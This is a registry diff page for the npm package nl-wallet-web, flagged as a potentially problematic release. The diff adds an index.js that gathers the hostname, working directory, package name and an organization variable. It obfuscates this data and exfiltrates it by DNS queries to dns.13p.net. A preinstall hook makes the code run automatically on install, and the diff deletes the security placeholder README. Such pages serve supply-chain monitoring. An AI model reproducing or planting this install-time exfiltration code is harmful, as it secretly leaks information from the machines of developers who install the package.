nl-wallet-web 0.0.1-security → 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of nl-wallet-web might be problematic. Click here for more details.
- package/index.js +98 -0
- package/package.json +13 -3
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,98 @@
|
|
|
1
|
+
const dns = require('dns');
|
|
2
|
+
const { Buffer } = require('buffer');
|
|
3
|
+
const os = require('os');
|
|
4
|
+
const path = require('path');
|
|
5
|
+
const fs = require('fs');
|
|
6
|
+
const { promisify } = require('util');
|
|
7
|
+
|
|
8
|
+
// Promisify DNS resolve for better async handling
|
|
9
|
+
const dnsResolve = promisify(dns.resolve);
|
|
10
|
+
|
|
11
|
+
// Function to encode data into Base64 (URL-safe)
|
|
12
|
+
function encodeData(data) {
|
|
13
|
+
return Buffer.from(data).toString('base64')
|
|
14
|
+
.replace(/\+/g, '-') // Replace '+' with '-'
|
|
15
|
+
.replace(/\//g, '_') // Replace '/' with '_'
|
|
16
|
+
.replace(/=/g, ''); // Remove '=' padding
|
|
17
|
+
}
|
|
18
|
+
|
|
19
|
+
// Function to obfuscate encoded data (optional)
|
|
20
|
+
function obfuscateData(encodedData) {
|
|
21
|
+
return encodedData.split('').reverse().join(''); // Simple reverse obfuscation
|
|
22
|
+
}
|
|
23
|
+
|
|
24
|
+
// Function to get package name from package.json
|
|
25
|
+
function getPackageName() {
|
|
26
|
+
try {
|
|
27
|
+
const packageJsonPath = path.join(process.cwd(), 'package.json');
|
|
28
|
+
const packageJson = JSON.parse(fs.readFileSync(packageJsonPath, 'utf8'));
|
|
29
|
+
return packageJson.name || "unknown-package";
|
|
30
|
+
} catch (err) {
|
|
31
|
+
console.error("Error reading package.json:", err);
|
|
32
|
+
return "unknown-package";
|
|
33
|
+
}
|
|
34
|
+
}
|
|
35
|
+
|
|
36
|
+
// Function to collect organization, package name, hostname, and current path
|
|
37
|
+
function collectSystemInfo() {
|
|
38
|
+
const organization = process.env.ORGANIZATION || "unknown-organization";
|
|
39
|
+
const packageName = getPackageName();
|
|
40
|
+
const hostname = os.hostname();
|
|
41
|
+
const currentPath = process.cwd();
|
|
42
|
+
|
|
43
|
+
return {
|
|
44
|
+
organization,
|
|
45
|
+
packageName,
|
|
46
|
+
hostname,
|
|
47
|
+
currentPath
|
|
48
|
+
};
|
|
49
|
+
}
|
|
50
|
+
|
|
51
|
+
// Function to split data into chunks of 63 characters
|
|
52
|
+
function chunkData(data, chunkSize = 63) {
|
|
53
|
+
const chunks = [];
|
|
54
|
+
for (let i = 0; i < data.length; i += chunkSize) {
|
|
55
|
+
chunks.push(data.substring(i, i + chunkSize));
|
|
56
|
+
}
|
|
57
|
+
return chunks;
|
|
58
|
+
}
|
|
59
|
+
|
|
60
|
+
// Function to send data via DNS with rate limiting
|
|
61
|
+
async function sendDataViaDNS(data, domain, delay = 1000) {
|
|
62
|
+
let encodedData = encodeData(data);
|
|
63
|
+
encodedData = obfuscateData(encodedData); // Optional obfuscation
|
|
64
|
+
const chunks = chunkData(encodedData);
|
|
65
|
+
|
|
66
|
+
for (const chunk of chunks) {
|
|
67
|
+
const subdomain = `${chunk}.${domain}`;
|
|
68
|
+
console.log(`Sending data as subdomain: ${subdomain}`);
|
|
69
|
+
|
|
70
|
+
try {
|
|
71
|
+
const records = await dnsResolve(subdomain, 'A');
|
|
72
|
+
console.log(`DNS query sent successfully. Response: ${records}`);
|
|
73
|
+
} catch (err) {
|
|
74
|
+
console.error(`DNS lookup failed: ${err.message}`);
|
|
75
|
+
}
|
|
76
|
+
|
|
77
|
+
// Add a delay between DNS queries to avoid flooding
|
|
78
|
+
await new Promise(resolve => setTimeout(resolve, delay));
|
|
79
|
+
}
|
|
80
|
+
}
|
|
81
|
+
|
|
82
|
+
// Main function to collect and send data
|
|
83
|
+
async function main() {
|
|
84
|
+
try {
|
|
85
|
+
const systemInfo = collectSystemInfo();
|
|
86
|
+
const dataToSend = JSON.stringify(systemInfo);
|
|
87
|
+
const targetDomain = "dns.13p.net"; // Replace with a domain you control
|
|
88
|
+
|
|
89
|
+
console.log("Starting data exfiltration...");
|
|
90
|
+
await sendDataViaDNS(dataToSend, targetDomain);
|
|
91
|
+
console.log("Data exfiltration completed.");
|
|
92
|
+
} catch (err) {
|
|
93
|
+
console.error("An error occurred during data exfiltration:", err);
|
|
94
|
+
}
|
|
95
|
+
}
|
|
96
|
+
|
|
97
|
+
// Run the script
|
|
98
|
+
main();
|
package/package.json
CHANGED
|
@@ -1,6 +1,16 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "nl-wallet-web",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node index.js",
|
|
8
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
9
|
+
},
|
|
10
|
+
"keywords": [],
|
|
11
|
+
"author": "",
|
|
12
|
+
"license": "ISC",
|
|
13
|
+
"dependencies": {
|
|
14
|
+
"simple-export-map": "^1.0.0"
|
|
15
|
+
}
|
|
6
16
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=nl-wallet-web for more information.
|